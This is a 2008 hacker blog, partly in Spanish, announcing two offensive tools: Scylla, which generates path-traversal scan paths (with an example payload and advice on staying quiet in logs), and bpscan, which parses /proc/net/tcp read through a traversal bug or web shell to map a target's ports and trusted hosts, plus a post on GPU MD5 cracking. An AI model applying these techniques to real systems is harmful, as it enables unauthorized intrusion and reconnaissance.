Thursday, October 30, 2008

Scylla v1.0b

.
Sometimes when you are exploiting a path traversal, you can't find a file, that could be frustrating.
Scylla will let you generate Triton exploit paths to scan for a target file in multiple locations.

You'll need java 1.6 to use it, so it will work in any box except for MacOS 10.4.9... Shit happens
when you depend of a monopoly

If you have any suggestion, bug reports, money, girlz or whatever PM me or send me a mail.

I hope you find this tool useful guys.

md5sum: 8cbf46a3a563bce13226dbba661fb551
sha1sum: ac4a0faad310658cd3dc603abe26a0bb391d2801

Download:

http://sites.google.com/site/apx808/Home/scylla.jar



Scylla - Triton paths generator
Coded by APX, Buenos Aires 2008
th4 f00k1ng c0wb0ys c0d1ng t3am
apx.808 [@] gmail.com

Contents:

1 - Intro
2 - Use
3 - Thanks
4 - Version history


[1 - Intro]

It's common in path traversal exploits to have problems
finding a file, httpd.conf anyone?
Well, the aim of this app it's to solve this issue.
Scylla will create a Triton exploit paths list to scan with
the different locations to search that you specify.

[2 - Use]

-Load the xploit data manually or using the "import" option
to import from a Triton exploit file.

-Add the tag "<PATH>" to the place you want Scylla to add
the posible locations. Also, don't forget that Scylla won't make
the traversal, so you'll need to provide the ../ be it in your
locations file or in the xploit path field, the same happens with
the poison byte. YOU are the one who exploits, Scylla just will
make easier a repetitive task.

Example:

Xploit path: /cgi-bin/vuln.php?file=../../..<PATH>

-Load a file with the posible locations of the file you are
looking for.

-Select a destination file.

-Push "generate".

-Now load the file with Triton and start scanning.


NOTE: Be careful how you use this because can be
VERY NOISY FOR THE LOGS.

Keep your simultaneos bots count low and
scan multiple sites if possible.

[3 - Thanks]

I would like to thanks Ange, Rudelgurke and my
fellow fooking cowboy Ex0rphine for your testing help.

[4 - Version History]

25-07-2008 - Project starts.

29-07-2008 - v1.0b starts being beta tested.

01-08-2008 - v1.0b Released to public.


Backdoor Port Scanner

.
1 - Intro


Scanning heavily filtered networks its a slow process because when
the target host drop the packages and don't send any reply Nmap
should wait the time out and then retry 10 times before marking the
port as filtered.

Calculating correctly RTT (Round Time Trip) and ABW (Available bandwidth)
values can improve Nmap timming considerabily, but a port scan fast or
slow still will be noisy.

So the idea is to do a port scan without doing it.

2 - The technique

The basic idea is using a traversal exploit or a web shell to get the files

/proc/net/tcp
/proc/net/udp

and then feed them to the tool bpscan that will parse the results and show
them in a human readable way.

The same can be done with tcp6, udp6 and raw files for IPv6 and raw sockets.

3 - What info can we get doing it

What a better way than seeing some examples

We can use it as a normal port scanner, as you will see bpscan will resolve
the service name.

Port Service
21 ftp
25 smtp
80 http
3306 mysql
5560 Unknown
37237 Unknown
37297 Unknown


Or we can use the "a" flag to see all the results from the dump without removing
the duplicates.






80
http93.129.xxx.xxx3514
3306mysql0.0.0.00
3306mysql72.232.xxx.xxx40140
5560Unknown0.0.0.00
37237Unknown72.232.xxx.xxx3306

This last example its resumed or it will be too long.

We can see the IP and port of the remote end.
If we have filtered ports we will be able to know what IPs are allowed to bypass
the firewall, spoof anyone?
The 0.0.0.0:0 are the TCP_LISTEN state ports.

But wait, lets see the same but with remote service resolution...





80http93.129.xxx.xxx3514must-p2p
3306mysql0.0.0.00Unknown
3306mysql72.232.xxx.xxx40140Unknown
5560Unknown0.0.0.00Unknown
37237Unknown72.232.xxx.xxx3306mysql

The first one haves a high port that resolves to must-p2p, it is the random
assigned port to connect to the 80 for sure, same with the IP connecting to the
mysql.
But... the last one is interesting, we can see our target is connecting to a
remote mysql... nice
This is useful to get a better understanding of our target and its network map.

4 - The tool

The tool its coded in Perl, I made it for personal use but decided to share it.

It's use is easy, check the manual.

Options:
-h Shows this really useful help
-i Defines the input file, if isn't defined, bpscan will use stdin
-f Sets the flags

Valid Flags:
a Shows all the entries, including the remote ip and port where the socket connects
r Resolve remote service

Examples:
bpscan -i=tcp.txt -f=ar
cat /proc/net/tcp | bpscan


5 - Conclusion

Ok guys I hope you find it useful.
I would like to thanks to Rudelgurke for his helpful info on Linux and BSD inner workings.
Please any comment, suggestion or idea, contact me at apx[dot]808[at]gmail[dot]com

6 - Download

http://sites.google.com/site/apx808/Home/bpscan.zip

7 - Extra

For a few comments I received I think there are some guys who don't really understand what is the tool for.
So, this is like 5 great reasons to use bpscan.

1 - If you only have a traversal xploit, you can search for open ports to discover new attack
vectors.
2 - If you have a web shell, you can get the same results using netstat, but you'll need to parse
the info by yourself and you cant get only once each open port like a "select distinct".
3 - bpscan will see the ports from behind, so if you have an open port behind a firewall you'll see
it too.
4 - If you see an incoming connection to a port you can't connect, seeing its IP can allow you to
guess the firewall rule, or discover a trusted host.
5 - You can see your target outgoing connections, and for what service are those for, so you can
gain a better understanding of your target's network map, other targets or new attack vectors.


.

Awesomeness

.

Tuesday, October 28, 2008

Lightning Hash Cracker

.
Estuve probando el LHC de Elcomsoft.
Basicamente es un password cracker que usa tecnologia CUDA para generar hashes MD5 a los palos.

English mode on: (I'm warned you about it)

Basically the Nvidia chip is a parallel procesor for mathematical operations. And this would be used like in 386 times, when some machines had a mathematical co processor.



In the above graphic you can see that it kills a normal processor performance in math ops, thats because the chipset is specifically designed to do the same math ops at really high speed in different data simultaneously.

Ok, some guys realized they could use that processing power to do other things instead of calculating doom 3 monsters, but they needed to use the normal graphics API , and that was a pain in the ass.

But Nvidia guys created a new API, just to use the parallel processing power of the board for simulations, or in this case, to generate hashes, the API is called CUDA (Compute Unified Device Architecture).

Actually I don't know what those commies registered, but using that API, ANY math op that is applied to multiple data, can be accelerated.


Bueno ahi arriba esta algo que habia posteado hace un tiempo, 30 de octube del 2007, que copado casi un año fue...
Bue, la idea es que en ese entonces los rusos como de costumbre ya tenian toolz privadas para bruteforcear MD5, nosotros nos creemos piolas pero cuando nosotros vamos los rusos ya estan de vuelta hace rato, algun dia capaz que me pongo a hablar sobre esto...

Veamos un grafico de hashes/segundo que nos entrega la tecnologia CUDA dependiendo que placa tengamos...



Y ahora mojemosnos un poco



Aca en esta pagina se pueden bajar 4 free el LHC http://www.elcomsoft.com/lhc.html
Yo lo estube probando un rato, tengo una Nvidia 8600 GTX y camina lindo tengo un average de 70.5 M hashes con un Intel Core2Duo 8400E.
Les cuento que por mas que usa la GPU le pega un castigo considerable al CPU tambien...

Friday, October 24, 2008

Inaguracion


.

Tenia creado este blog de hace un par de meses pero nunca me dignaba a escribir algo.
Que pueden esperar?
Bueno como el nombre lo dice, mis delirios, desvarios, limes cerebrales. Generalmente van a ser sobre "inseguridad informatica" como a mi me gusta llamarle, o alguna cosa que me parezca que vale la pena compartir.

Creo dentro de todo que mi español es bastante bueno, asi que no van a encontrar ninguna burrada extrema, excepto porque no uso acentos en ningun lado, tambien es probable que a veces postee cosas en ingles... Y bue, me da paja escribir lo mismo en dos idiomas asi que defaulteo a ingles.

Sobre mi nick...
Se dice "eiphex" o "apex" depende que tan yanki quieras sonar, pero segurisimo no se dice "a pe equis"asi como deletreandolo en español que apesta.
Cuando me lo puse estaba muy cebado con el tema "Come to daddy" de Aphex Twin, tiempo despues se me dio por hacerme el fashion y resumirlo a 3 letras, les dejo el famoso video, es una lima, por eso me gusta tanto hehe

Bueno chau

Test

.
Testing 1,2,3
El gato volador



 
hit counter script